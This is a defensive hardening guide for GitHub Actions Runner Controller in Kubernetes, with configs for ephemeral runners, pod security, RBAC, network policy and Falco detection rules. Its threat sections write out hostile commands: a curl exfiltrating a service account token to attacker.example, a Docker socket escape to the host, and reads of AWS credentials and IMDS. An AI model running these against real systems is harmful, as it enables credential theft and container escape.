GitHub Actions Runner Controller Security: Ephemeral Runners and Pod Isolation in Kubernetes
The Problem
GitHub Actions Runner Controller is a Kubernetes operator that watches the GitHub API for queued workflow jobs and provisions runner pods on-demand. Each pod registers with GitHub as a self-hosted runner, receives job assignments, executes the workflow steps defined in the repository’s .github/workflows/ files, reports results back, and is — in the default installation — left running to accept the next job. That last part is the critical failure.
CI code is arbitrary. Any developer with permission to open a pull request can insert workflow steps that execute on the runner pod. Any dependency — a Node package, a Go module, a PyPI library — that is fetched and executed during the build also runs on the runner pod. When that pod lives in your Kubernetes cluster, the threat surface extends well beyond the CI pipeline:
What ARC actually creates: An AutoscalingRunnerSet instructs the ARC controller to create runner pods in a specified namespace. The controller is a Kubernetes Deployment that holds a service account with the RBAC permissions needed to create and delete pods, manage secrets, and coordinate runner registration. The runner pods it creates are regular Kubernetes pods in your cluster. They share the kernel with every other pod on the same node. They can reach any endpoint that the cluster’s network policy permits.
The persistent runner problem: By default, ARC runner pods are not ephemeral. After completing a job, the runner re-registers with GitHub and waits for the next assignment. A malicious workflow step that writes a backdoor to the runner’s filesystem, installs a cron job inside the container, or modifies the runner binary affects every subsequent job on that pod. Worse: the runner’s work directory retains artifacts from previous jobs. A workflow that reads ./_work/ may access environment variables, credentials, or code artifacts belonging to a different workflow that ran before it on the same pod.
The service account inheritance problem: The ARC controller service account requires substantial Kubernetes API access — it needs to create and delete pods, read and write secrets for GitHub registration tokens, and manage the runner lifecycle. When this service account is assigned to runner pods (which happens when the AutoscalingRunnerSet is misconfigured or uses default values), a workflow step can read /var/run/secrets/kubernetes.io/serviceaccount/token and make API calls against the Kubernetes control plane with whatever permissions the controller service account holds.
The concrete attack paths:
A developer on your team opens a PR containing a build step that runs curl -s "https://attacker.example/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)". The GitHub Actions workflow triggers on pull request. The runner pod executes this step. If the pod has a service account token mounted, the token is exfiltrated before the PR is reviewed or merged. The attacker now has a Kubernetes API token; depending on the controller’s RBAC, this may provide pod creation, secret read access, or cluster-admin equivalent. The PR can be closed immediately; the token is already gone.
A different attack path: the ARC runner pod is configured with a mounted Docker socket for builds that require Docker. A workflow step runs docker run --privileged --pid=host --net=host -v /:/host alpine chroot /host sh — standard Docker socket escape. The workflow now has root on the Kubernetes node. From the node, it can read the kubelet’s credentials, access secrets mounted into other pods via the host filesystem at /var/lib/kubelet/pods/, and potentially pivot to the control plane.
A third path: the runner is not ephemeral. A previous job on this runner ran a deployment workflow that mounted AWS_DEPLOY_ROLE_ARN as an environment variable. The environment variable is gone — but shell history, cached AWS CLI credentials under ~/.aws/, and any artifacts written to the work directory remain. The next job, triggered by a different workflow, can read ~/.aws/credentials and exfiltrate production cloud access.
None of these require an external attacker. Any developer with PR access can execute these paths. The Kubernetes cluster running your CI pipeline is an attractive target precisely because CI pipelines routinely hold credentials to everywhere else: registries, cloud environments, secret managers, other clusters.
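To make the first attack path concrete, it helps to see what a service account token reveals to whoever holds it. The sketch below decodes the payload of a JWT without verifying it and prints the sub claim, which for Kubernetes service account tokens has the form system:serviceaccount:<namespace>:<name>. The token here is synthetic and the helper names are hypothetical; this is an illustration under those assumptions, not a verification routine.

```python
import base64
import json


def decode_jwt_claims(token: str) -> dict:
    """Return the unverified claims from a JWT's payload segment."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    payload = parts[1]
    # JWT segments are base64url without padding; restore it before decoding.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def _b64url(obj: dict) -> str:
    """Encode a dict as an unpadded base64url JSON segment."""
    raw = json.dumps(obj).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Synthetic token for illustration only; the signature is a placeholder.
sample_token = ".".join([
    _b64url({"alg": "RS256", "typ": "JWT"}),
    _b64url({"sub": "system:serviceaccount:arc-system:arc-controller"}),
    "signature-placeholder",
])

claims = decode_jwt_claims(sample_token)
print(claims["sub"])  # system:serviceaccount:arc-system:arc-controller
```

The same decoding is useful defensively: given a token found in logs or an incident report, the sub claim identifies which service account needs its RBAC reviewed.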
Threat Model
- Node credential access via /proc: A runner pod that shares the host PID namespace (hostPID: true) and runs without seccomp restrictions can read /proc/<kubelet-pid>/environ. The kubelet process environment contains configuration that may include bootstrap tokens or endpoint credentials. With node-level access, enumeration of secret material mounted into other pods becomes straightforward via the host filesystem.
- Docker socket escape: An ARC configuration that mounts /var/run/docker.sock to support Docker-in-Docker gives any workflow step host-level access. A docker run --privileged call from within the runner escapes the pod boundary entirely.
- Service account token abuse: Runner pods that inherit the ARC controller’s service account, or any service account with meaningful RBAC, expose Kubernetes API access to every workflow step. The token is auto-mounted at a predictable path and readable by any process in the pod.
- Cross-job secret leakage on persistent runners: A non-ephemeral runner retains filesystem state between jobs. Cloud CLI credential caches, shell history, git credentials, and work-directory artifacts from one job are readable by subsequent jobs — potentially from different repositories or teams if the runner is shared.
- ARC controller RBAC over-grant: The controller requires cluster-scoped RBAC to manage pods and secrets. If that RBAC is applied to runner pods instead of only to the controller, any compromised workflow can enumerate and access cluster resources at the controller’s privilege level.
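The threats listed above map onto a handful of pod spec fields, so they can be checked mechanically. The following is a minimal sketch that takes a pod spec as a plain Python dict (for example, the spec portion of kubectl get pod -o json output) and reports which of these conditions are present. The function name and the two sample specs are hypothetical, and the check covers only the fields discussed in this article.

```python
def find_runner_risks(pod_spec: dict) -> list[str]:
    """Return threat-model findings for a pod spec given as a plain dict."""
    findings = []
    # If the pod does not set this to false, the service account's setting
    # applies, and that defaults to mounting the token.
    if pod_spec.get("automountServiceAccountToken") is not False:
        findings.append("service account token may be auto-mounted")
    for field in ("hostPID", "hostIPC", "hostNetwork"):
        if pod_spec.get(field, False):
            findings.append(f"{field} is enabled")
    for volume in pod_spec.get("volumes", []):
        path = volume.get("hostPath", {}).get("path", "")
        if path.endswith("docker.sock"):
            findings.append(f"Docker socket mounted from {path}")
        elif path:
            findings.append(f"hostPath volume mounted from {path}")
    return findings


# Hypothetical specs for illustration.
risky = {
    "hostPID": True,
    "volumes": [{"name": "docker", "hostPath": {"path": "/var/run/docker.sock"}}],
}
hardened = {
    "automountServiceAccountToken": False,
    "volumes": [{"name": "work", "emptyDir": {}}],
}

for finding in find_runner_risks(risky):
    print("RISK:", finding)
print(find_runner_risks(hardened))  # []
```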
Hardening Configuration
1. Ephemeral Runners: One Pod Per Job
The most important configuration is also the simplest: configure runners as ephemeral. An ephemeral runner registers with GitHub, executes exactly one job, deregisters, and terminates. The pod is deleted. The next job gets a new pod with a clean filesystem, no residual credentials, and no history from previous jobs.
ARC’s AutoscalingRunnerSet resource controls this. The minRunners: 0 and maxRunners combination allows scale-to-zero. The runner image handles ephemeral behaviour via the RUNNER_EPHEMERAL environment variable — the runner process calls GitHub’s runner deregistration API after the job completes, then exits, which causes the pod to reach Completed state and be garbage collected by ARC.
apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
  name: arc-runner-set
  namespace: arc-runners
spec:
  githubConfigUrl: "https://github.com/myorg"
  githubConfigSecret: arc-github-secret
  # Scale to zero when no jobs are queued
  minRunners: 0
  maxRunners: 10
  template:
    spec:
      containers:
        - name: runner
          image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
          env:
            - name: RUNNER_EPHEMERAL
              value: "true"
          # Explicit: runner exits after one job
          # ARC detects the completed pod and deletes it
          # Next job queued → new pod created from clean image
Pinning the runner image to a digest rather than a tag applies the same supply-chain reasoning as SHA-pinning actions: the image pulled for each pod is cryptographically fixed to a specific layer set. A new runner image release does not automatically reach your pods until you update the digest reference and redeploy.
The trade-off is cold-start latency. Pod scheduling, image pull (if not cached on the node), and runner registration with GitHub’s API take 30–60 seconds. For repositories where CI jobs are infrequent or where latency is acceptable, this is the correct trade-off. For repositories with very high job throughput, pre-warming a small pool (minRunners: 2) reduces median latency, but those pre-warmed runners should still be ephemeral: they register as ephemeral runners, execute one job, and are replaced by ARC before accepting another.
2. Runner Pod Security Standards
Runner pods need to write to their workspace — readOnlyRootFilesystem: true breaks most CI use cases because workflow steps write temporary files, install tools into the runner’s PATH, and populate the work directory. Everything else should be locked down.
apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
  name: arc-runner-set
  namespace: arc-runners
spec:
  githubConfigUrl: "https://github.com/myorg"
  githubConfigSecret: arc-github-secret
  minRunners: 0
  maxRunners: 10
  template:
    metadata:
      labels:
        app: arc-runner
        # Label used by NetworkPolicy and Falco selectors
    spec:
      # No host-level namespace sharing
      hostPID: false
      hostIPC: false
      hostNetwork: false
      # Runners do not need Kubernetes API access
      automountServiceAccountToken: false
      securityContext:
        runAsNonRoot: true
        runAsUser: 1001 # The 'runner' user in the actions-runner image
        runAsGroup: 1001
        fsGroup: 1001
        seccompProfile:
          type: RuntimeDefault
        # RuntimeDefault seccomp blocks ~40 syscalls the runner never needs,
        # including ptrace (used in process injection), mount (used in
        # container escape attempts), and kexec_load.
      containers:
        - name: runner
          image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
          env:
            - name: RUNNER_EPHEMERAL
              value: "true"
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: false # Required: runner writes to /home/runner
            capabilities:
              drop: ["ALL"]
            # No capabilities added back: runner doesn't need NET_ADMIN,
            # SYS_PTRACE, SYS_ADMIN, or anything else from the default set
          resources:
            requests:
              cpu: "500m"
              memory: "512Mi"
            limits:
              cpu: "2"
              memory: "4Gi"
          volumeMounts:
            - name: work
              mountPath: /home/runner/_work
          # No hostPath mounts
          # No Docker socket mount
      volumes:
        - name: work
          emptyDir: {}
          # emptyDir is pod-scoped: created when pod starts, deleted when pod
          # terminates. No data persists between jobs.
      # No tolerations for tainted nodes unless runners are on dedicated nodes
The automountServiceAccountToken: false line is the most operationally important field after ephemerality. It prevents the Kubernetes API token from appearing at /var/run/secrets/kubernetes.io/serviceaccount/token. A workflow step that calls curl https://kubernetes.default.svc/api/v1/secrets -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" fails at the cat because the file does not exist, so the request carries no valid credential and the API server rejects it instead of returning secrets.
Apply the restricted Pod Security Standard to the arc-runners namespace:
apiVersion: v1
kind: Namespace
metadata:
  name: arc-runners
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted
The restricted PSS enforces runAsNonRoot, allowPrivilegeEscalation: false, capabilities.drop: ALL, and requires either RuntimeDefault or a named seccomp profile. ARC pods that do not meet these requirements are rejected at admission. The label applies enforcement to all pods in the namespace, not just runner pods — this also constrains any misconfigured ARC controller component that lands in the wrong namespace.
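Because a rejected pod only shows up at admission time, it can be useful to check a pod template against these requirements before applying it. The sketch below tests only the four requirements named above (runAsNonRoot, allowPrivilegeEscalation, dropped capabilities, seccomp profile); the real restricted profile checks more than this, and the function name and sample specs are hypothetical.

```python
def restricted_violations(pod_spec: dict) -> list[str]:
    """Check a pod spec dict against a subset of the restricted profile."""
    pod_sc = pod_spec.get("securityContext", {})
    problems = []
    for container in pod_spec.get("containers", []):
        sc = container.get("securityContext", {})
        name = container.get("name", "<unnamed>")
        # Container-level values take precedence over pod-level values.
        if sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot")) is not True:
            problems.append(f"{name}: runAsNonRoot must be true")
        if sc.get("allowPrivilegeEscalation") is not False:
            problems.append(f"{name}: allowPrivilegeEscalation must be false")
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            problems.append(f"{name}: capabilities.drop must include ALL")
        seccomp = sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}
        if seccomp.get("type") not in ("RuntimeDefault", "Localhost"):
            problems.append(f"{name}: seccompProfile must be RuntimeDefault or Localhost")
    return problems


# Mirrors the security settings of the runner template in this section.
hardened_spec = {
    "securityContext": {
        "runAsNonRoot": True,
        "seccompProfile": {"type": "RuntimeDefault"},
    },
    "containers": [{
        "name": "runner",
        "securityContext": {
            "allowPrivilegeEscalation": False,
            "capabilities": {"drop": ["ALL"]},
        },
    }],
}
bare_spec = {"containers": [{"name": "runner"}]}

print(restricted_violations(hardened_spec))  # []
for problem in restricted_violations(bare_spec):
    print(problem)
```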
3. Separate Service Accounts: Controller vs. Runner
The ARC controller service account requires meaningful Kubernetes API access. Runner pods require none. These must be separate accounts, and runner pods must explicitly reference the no-permission account.
# Controller service account: narrow RBAC, stays in arc-system namespace
apiVersion: v1
kind: ServiceAccount
metadata:
  name: arc-controller
  namespace: arc-system
---
# Runner service account: no token, no RBAC
apiVersion: v1
kind: ServiceAccount
metadata:
  name: arc-runner
  namespace: arc-runners
automountServiceAccountToken: false
---
# Minimal RBAC for the controller: only what ARC actually needs
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: arc-controller
  namespace: arc-runners
rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["get", "list", "watch", "create", "delete"]
  - apiGroups: [""]
    resources: ["secrets"]
    verbs: ["get", "list", "watch", "create", "update", "delete"]
    # Secrets access is scoped to arc-runners namespace only
  - apiGroups: ["actions.github.com"]
    resources: ["ephemeralrunners", "ephemeralrunnersets"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: arc-controller
  namespace: arc-runners
subjects:
  - kind: ServiceAccount
    name: arc-controller
    namespace: arc-system
roleRef:
  kind: Role
  name: arc-controller
  apiGroup: rbac.authorization.k8s.io
In the AutoscalingRunnerSet, explicitly reference the runner service account:
spec:
  template:
    spec:
      serviceAccountName: arc-runner
      automountServiceAccountToken: false
      # Both fields: serviceAccountName prevents inheriting the default SA,
      # automountServiceAccountToken: false prevents token mounting even if
      # the SA has tokens defined.
The default service account in any namespace has no RBAC, but it does have a token auto-mounted unless the namespace default is changed. Setting both fields eliminates the auto-mount regardless of namespace-level defaults.
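The difference between the two accounts can be made explicit by evaluating a request against each account's rules. The sketch below is a simplified model of how RBAC rules match a request: it ignores resourceNames, subresources, and non-resource URLs, and the function names are hypothetical. The controller rules are copied from the Role in this section, and the runner is modelled as having no rules because no Role is bound to it.

```python
def rule_allows(rule: dict, api_group: str, resource: str, verb: str) -> bool:
    """True if one RBAC rule permits the verb on the resource."""
    def matches(allowed: list, value: str) -> bool:
        return "*" in allowed or value in allowed

    return (
        matches(rule.get("apiGroups", []), api_group)
        and matches(rule.get("resources", []), resource)
        and matches(rule.get("verbs", []), verb)
    )


def role_allows(rules: list, api_group: str, resource: str, verb: str) -> bool:
    """RBAC is additive: a request is allowed if any rule allows it."""
    return any(rule_allows(r, api_group, resource, verb) for r in rules)


CONTROLLER_RULES = [
    {"apiGroups": [""], "resources": ["pods"],
     "verbs": ["get", "list", "watch", "create", "delete"]},
    {"apiGroups": [""], "resources": ["secrets"],
     "verbs": ["get", "list", "watch", "create", "update", "delete"]},
    {"apiGroups": ["actions.github.com"],
     "resources": ["ephemeralrunners", "ephemeralrunnersets"],
     "verbs": ["get", "list", "watch", "create", "update", "patch", "delete"]},
]
RUNNER_RULES: list = []  # no Role is bound to the arc-runner account

print(role_allows(CONTROLLER_RULES, "", "secrets", "get"))              # True
print(role_allows(RUNNER_RULES, "", "secrets", "get"))                  # False
print(role_allows(CONTROLLER_RULES, "apps", "deployments", "create"))   # False
```

On a live cluster, kubectl auth can-i with the --as flag answers the same question against the real authorizer.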
4. Network Policy: Isolate Runner Pods from Internal Cluster Services
Runner pods have legitimate network needs: they must reach api.github.com to register and report job results, objects.githubusercontent.com and pipelines.actions.githubusercontent.com to download action code and receive job payloads, and any container registry your workflows pull from. They do not need to reach the Kubernetes API server, etcd, internal cluster services, or the cloud instance metadata endpoint (IMDS).
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: arc-runner-isolation
  namespace: arc-runners
spec:
  podSelector:
    matchLabels:
      app: arc-runner
  policyTypes:
    - Ingress
    - Egress
  # No ingress: runners initiate outbound connections only.
  # GitHub pushes job assignments via a long-poll from the runner process,
  # so no inbound connections are required.
  ingress: []
  egress:
    # DNS: required for GitHub hostname resolution
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
      ports:
        - port: 53
          protocol: UDP
        - port: 53
          protocol: TCP
    # HTTPS: GitHub API and Actions infrastructure
    # In environments with an egress proxy, restrict to the proxy IP instead
    - ports:
        - port: 443
          protocol: TCP
      to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              # Block cloud IMDS endpoints: no runner needs instance metadata
              - 169.254.169.254/32 # AWS / Azure IMDS
              - 169.254.170.2/32 # ECS task metadata
              # Block Kubernetes API server: runners don't need cluster API access
              # Replace with your actual API server CIDR
              - 10.96.0.1/32 # kubernetes.default.svc ClusterIP (typical)
              # Block internal pod CIDRs: runners shouldn't reach other pods
              - 10.244.0.0/16 # Pod CIDR (adjust to your cluster's pod CIDR)
              - 10.96.0.0/12 # Service CIDR (adjust to your cluster's service CIDR)
The IMDS block is particularly important in cloud environments. AWS, Azure, and GCP instance metadata services are reachable at link-local addresses from any pod on the node unless explicitly blocked. A workflow step that curls http://169.254.169.254/latest/meta-data/iam/security-credentials/ retrieves the node’s attached IAM role credentials without any authentication. In EKS clusters, this is how a compromised runner pod can obtain IAM credentials scoped to the node’s instance profile — potentially with permissions far beyond what the CI pipeline needs.
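The ipBlock logic is easy to misread, so it can help to evaluate a few destinations against it by hand. The sketch below models only the HTTPS egress rule of the policy above (the DNS rule is separate) using Python's ipaddress module. It is a paper model of the rule's intent, not of how any particular CNI evaluates traffic, and 203.0.113.10 is a documentation address standing in for an arbitrary external host.

```python
import ipaddress

# Values copied from the HTTPS egress rule; adjust to your cluster's CIDRs.
ALLOW_CIDR = ipaddress.ip_network("0.0.0.0/0")
EXCEPT_CIDRS = [ipaddress.ip_network(c) for c in (
    "169.254.169.254/32",  # cloud IMDS
    "169.254.170.2/32",    # ECS task metadata
    "10.96.0.1/32",        # kubernetes.default.svc ClusterIP (typical)
    "10.244.0.0/16",       # pod CIDR
    "10.96.0.0/12",        # service CIDR
)]


def egress_permitted(dest_ip: str, port: int) -> bool:
    """True if the HTTPS rule would permit a TCP connection to dest_ip:port."""
    if port != 443:
        return False
    addr = ipaddress.ip_address(dest_ip)
    if addr not in ALLOW_CIDR:
        return False
    # An address inside any except block is carved out of the allow range.
    return not any(addr in net for net in EXCEPT_CIDRS)


print(egress_permitted("203.0.113.10", 443))     # True: external HTTPS
print(egress_permitted("169.254.169.254", 443))  # False: IMDS
print(egress_permitted("10.96.0.1", 443))        # False: API server ClusterIP
print(egress_permitted("10.244.3.7", 443))       # False: another pod
print(egress_permitted("203.0.113.10", 22))      # False: port not allowed
```

Note that 10.96.0.1/32 already falls inside 10.96.0.0/12; listing it separately is redundant but documents the intent.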
The NetworkPolicy requires a CNI plugin that enforces it: Calico, Cilium, Weave Net, or similar. The default Kubernetes networking does not enforce NetworkPolicy objects. Verify enforcement is active before relying on this control:
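# Create a test pod in arc-runners and attempt a TCP connection to the API server.
# If the namespace enforces the restricted Pod Security Standard, the pod needs a
# compliant securityContext (for example via --overrides) or it is rejected at admission.
kubectl run netpol-test \
  --image=alpine --restart=Never \
  --namespace=arc-runners \
  --labels="app=arc-runner" \
  -- sh -c "nc -z -w 5 kubernetes.default.svc 443 && echo REACHABLE || echo BLOCKED"
# Once the pod has completed, read its output:
kubectl logs netpol-test --namespace=arc-runners
# Expected output with enforcement: BLOCKED (connection times out)
# Output without enforcement: REACHABLE (TCP connection succeeds)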
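The same reachability check can be sketched in Python, which is convenient when the test needs to run from inside a workflow step on a real runner rather than from a throwaway pod. This is a minimal TCP probe using only the standard library; the function name is hypothetical, and it tests connectivity only, not authentication.

```python
import socket


def can_connect(host: str, port: int, timeout: float = 5.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers DNS failures, refused connections, and timeouts.
        return False
```

Calling can_connect("kubernetes.default.svc", 443) from a runner pod should return False when the policy is enforced. Running the same probe against 169.254.169.254 on port 80 checks the IMDS block.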
5. Build Container Images Without the Docker Socket
The most common justification for mounting the Docker socket into runner pods is image builds. The Docker socket mount is a host-escape vector. The alternative is daemonless image building tools that run entirely in userspace within the container.
Kaniko builds Docker images from a Dockerfile without requiring daemon access or elevated privileges:
# .github/workflows/build.yml
jobs:
  build:
    runs-on: arc-runner-set
    steps:
      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
      - name: Build and push with Kaniko
        run: |
          /kaniko/executor \
            --dockerfile="${GITHUB_WORKSPACE}/Dockerfile" \
            --context="dir://${GITHUB_WORKSPACE}" \
            --destination="${REGISTRY}/${IMAGE_NAME}:${GITHUB_SHA}" \
            --cache=true \
            --cache-repo="${REGISTRY}/${IMAGE_NAME}/cache"
        env:
          REGISTRY: ghcr.io/myorg
          IMAGE_NAME: myapp
For Kaniko to be available in the runner pod, either use a runner image that includes the Kaniko executor, or use ARC’s container mode where the Kaniko step runs in a sidecar container:
# AutoscalingRunnerSet with Kaniko as an init container or sidecar
spec:
  template:
    spec:
      initContainers:
        - name: kaniko-setup
          image: gcr.io/kaniko-project/executor:v1.21.0@sha256:...
          command: ["cp", "/kaniko/executor", "/shared/kaniko"]
          volumeMounts:
            - name: shared-tools
              mountPath: /shared
      containers:
        - name: runner
          # ... runner config ...
          volumeMounts:
            - name: shared-tools
              mountPath: /usr/local/bin
          # Kaniko executor available as /usr/local/bin/kaniko
      volumes:
        - name: shared-tools
          emptyDir: {}
Buildah is an alternative that also supports rootless operation. Both tools write to OCI-compliant registries directly, skipping the Docker daemon entirely. Neither requires --privileged, neither requires host filesystem mounts, and neither provides an escape path from the runner pod boundary.
6. Detect Suspicious Runner Activity with Falco
Runtime detection provides a second line of defence when a misconfiguration slips through or when a new attack technique bypasses preventive controls. Falco runs as a DaemonSet and monitors syscall activity from every pod on the node.
# falco-rules-arc.yaml: deploy via ConfigMap into Falco's rules directory
customRules:
  arc-runner-rules.yaml: |-
    # Runner reads host-level credential paths
    - rule: ARC runner accessing host credential paths
      desc: >
        A GitHub Actions runner pod is reading paths associated with
        node-level credentials. This may indicate an attempt to read
        kubelet credentials or other node secret material.
      condition: >
        container.label.app = "arc-runner" and
        open_read and
        (fd.name startswith "/proc/" or
         fd.name startswith "/var/lib/kubelet/" or
         fd.name startswith "/etc/kubernetes/" or
         fd.name contains "/serviceaccount/token")
      output: >
        ARC runner reading host credential path
        (pod=%k8s.pod.name ns=%k8s.ns.name path=%fd.name
        user=%user.name cmd=%proc.cmdline)
      priority: CRITICAL
      tags: [arc, runner, credential-access]

    # Runner executes kubectl: API server contact attempt
    - rule: ARC runner executing kubectl
      desc: >
        kubectl execution inside a runner pod indicates an attempt to
        interact with the Kubernetes API. Runners should have no cluster
        API access; this is anomalous in all cases.
      condition: >
        container.label.app = "arc-runner" and
        spawned_process and
        (proc.name = "kubectl" or
         proc.name = "helm" or
         proc.name = "k9s" or
         proc.name = "kustomize")
      output: >
        Kubernetes tooling executed in ARC runner pod
        (pod=%k8s.pod.name cmd=%proc.cmdline user=%user.name)
      priority: WARNING
      tags: [arc, runner, lateral-movement]

    # Runner spawns shell from non-runner parent: post-compromise persistence
    - rule: ARC runner unexpected shell spawn
      desc: >
        A shell process is spawned with an unexpected parent process inside
        a runner pod. The runner process legitimately spawns shells to execute
        workflow steps; a shell spawned from curl, wget, or python suggests
        code execution from a fetched payload.
      condition: >
        container.label.app = "arc-runner" and
        spawned_process and
        proc.name in (shell_binaries) and
        proc.pname in (curl, wget, python, python3, node, ruby) and
        not proc.pname = "Runner.Worker"
      output: >
        Unexpected shell spawn in ARC runner pod
        (pod=%k8s.pod.name shell=%proc.name parent=%proc.pname
        cmd=%proc.cmdline)
      # Falco has no HIGH priority; ERROR is the level between CRITICAL and WARNING
      priority: ERROR
      tags: [arc, runner, execution]

    # Runner attempts outbound connection to non-standard port
    - rule: ARC runner non-HTTPS outbound connection
      desc: >
        A runner pod is initiating a network connection on a port other
        than 443, 80, or 53. Legitimate runner activity (GitHub API, registry
        pulls, package downloads) uses HTTPS. Outbound connections on other
        ports from runner pods warrant investigation.
      condition: >
        container.label.app = "arc-runner" and
        outbound and
        fd.sport != 443 and
        fd.sport != 53 and
        fd.sport != 80
      output: >
        ARC runner non-standard outbound connection
        (pod=%k8s.pod.name dstip=%fd.rip dstport=%fd.rport
        cmd=%proc.cmdline)
      priority: NOTICE
      tags: [arc, runner, network]
Deploy Falco in kernel module or eBPF mode. The rules above use label selectors (container.label.app = "arc-runner") to scope detection to runner pods without generating noise from other workloads. Route alerts from the credential-path and unexpected-shell rules to your incident response channel; send alerts from the kubectl and non-HTTPS rules to a monitoring queue for daily review.
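The routing split can also be automated by priority. The sketch below assumes Falco is configured for JSON output, where each alert is one JSON object per line with a priority field, and sends anything at or above a chosen level to the incident channel. The destination names and the function name are hypothetical; in practice a forwarder such as Falcosidekick would normally do this job.

```python
import json

# Falco's priority levels, most severe first.
PRIORITIES = [
    "emergency", "alert", "critical", "error",
    "warning", "notice", "informational", "debug",
]
SEVERITY = {name: rank for rank, name in enumerate(PRIORITIES)}
SEVERITY["info"] = SEVERITY["informational"]  # accept the short form too


def route_alert(line: str, page_at: str = "error") -> str:
    """Return the destination for one JSON-formatted Falco alert line."""
    event = json.loads(line)
    level = str(event.get("priority", "")).lower()
    # Unknown or missing priorities are escalated rather than silently dropped.
    rank = SEVERITY.get(level, 0)
    return "incident-response" if rank <= SEVERITY[page_at] else "daily-review"


samples = [
    '{"rule": "ARC runner accessing host credential paths", "priority": "Critical"}',
    '{"rule": "ARC runner executing kubectl", "priority": "Warning"}',
    '{"rule": "ARC runner non-HTTPS outbound connection", "priority": "Notice"}',
]
for sample in samples:
    print(route_alert(sample))
```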
Expected Behaviour
Watching the runner pod lifecycle with kubectl get pods -n arc-runners -w for an ephemeral runner set:
NAME READY STATUS RESTARTS AGE
arc-runner-set-rg9k4-runner 0/1 Pending 0 0s
arc-runner-set-rg9k4-runner 0/1 Init:0/1 0 2s
arc-runner-set-rg9k4-runner 1/1 Running 0 8s
# Job executes for ~45 seconds
arc-runner-set-rg9k4-runner 0/1 Completed 0 53s
arc-runner-set-rg9k4-runner 0/1 Terminating 0 54s
# Pod deleted; next job queued → new pod with new name
arc-runner-set-rg9k5-runner 0/1 Pending 0 61s
Each pod name includes a random suffix: rg9k4, rg9k5. Each pod starts from a clean copy of the runner image. The emptyDir volume that held the previous job’s workspace is gone with the pod.
A workflow step that attempts to reach the Kubernetes API server from a runner pod with the network policy applied:
# Inside a workflow step (-S shows errors despite -s; --max-time bounds the wait):
curl -sSk --max-time 10 https://kubernetes.default.svc/api/v1/namespaces \
  -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo 'no-token')"
# Result with automountServiceAccountToken: false and NetworkPolicy enforced:
# - The token file does not exist, so the header falls back to 'no-token'
#   (the error from cat is suppressed by 2>/dev/null).
# - DNS is permitted by the policy, so the name resolves, but traffic to the
#   API server is dropped: curl exits with code 28 (timeout), or code 7
#   (failed to connect) if the CNI rejects instead of dropping.
A workflow step that runs cat /proc/1/environ triggers the Falco rule ARC runner accessing host credential paths within milliseconds. The alert appears in your SIEM or alerting channel. The workflow step itself still completes: Falco is a detection tool, not an enforcement tool, unless its alerts are wired to a response action. For enforcement, pair it with a response component that acts on Falco alerts (for example, by deleting the offending pod), or with Tetragon, which can terminate the process directly.
Trade-offs
Ephemeral runner cold-start latency: Pod scheduling, image pull, and GitHub runner registration take 30–60 seconds on a warm node with a cached image. For repositories where jobs queue frequently, this latency is the primary operational complaint. Mitigations: pre-pull the runner image via a DaemonSet on dedicated runner nodes, use minRunners: 2 for a standing pool of ephemeral runners (they each register and wait for exactly one job before terminating), and place runner nodes in the same availability zone as the scheduler. The latency is a fixed cost. The alternative, persistent runners, trades 45 seconds of startup time for the entire attack surface described above.
No Docker socket, no easy Docker builds: Some CI workflows have hard dependencies on Docker daemon features: multi-platform builds via docker buildx, BuildKit cache mounts, or legacy docker-compose test setups. Kaniko covers the common case (Dockerfile to registry) but does not support all BuildKit features. Buildah covers more of the OCI build surface. For multi-platform builds, Kaniko supports --custom-platform; for cache mounts, the runner pod can be configured with a persistent volume claim for the Kaniko layer cache rather than using BuildKit’s cache mount syntax. The migration cost is real but bounded — most CI image builds reduce to FROM, COPY, RUN, CMD and work unchanged with Kaniko.
readOnlyRootFilesystem: false: Most container security guidance recommends readOnlyRootFilesystem: true. Runner pods cannot function with this set — workflow steps install tools, write temporary files, and populate the work directory under /home/runner/. This is a legitimate exception driven by the runner’s operational requirements. The compensating controls are: runAsNonRoot: true (the runner user cannot write to paths owned by root), capabilities: drop: ALL (the runner user cannot escalate or change file ownership), and the emptyDir workspace that is destroyed with the pod.
NetworkPolicy except blocks are fragile: The ipBlock.except syntax requires knowing your API server’s ClusterIP, pod CIDR, and service CIDR. These values differ between clusters and may change if the cluster is rebuilt. A more robust approach for clusters with Cilium: use CiliumNetworkPolicy with toFQDNs rules that explicitly name the allowed GitHub endpoints rather than using IP block exceptions. This is more maintainable and more precise, but introduces a Cilium dependency.
Failure Modes
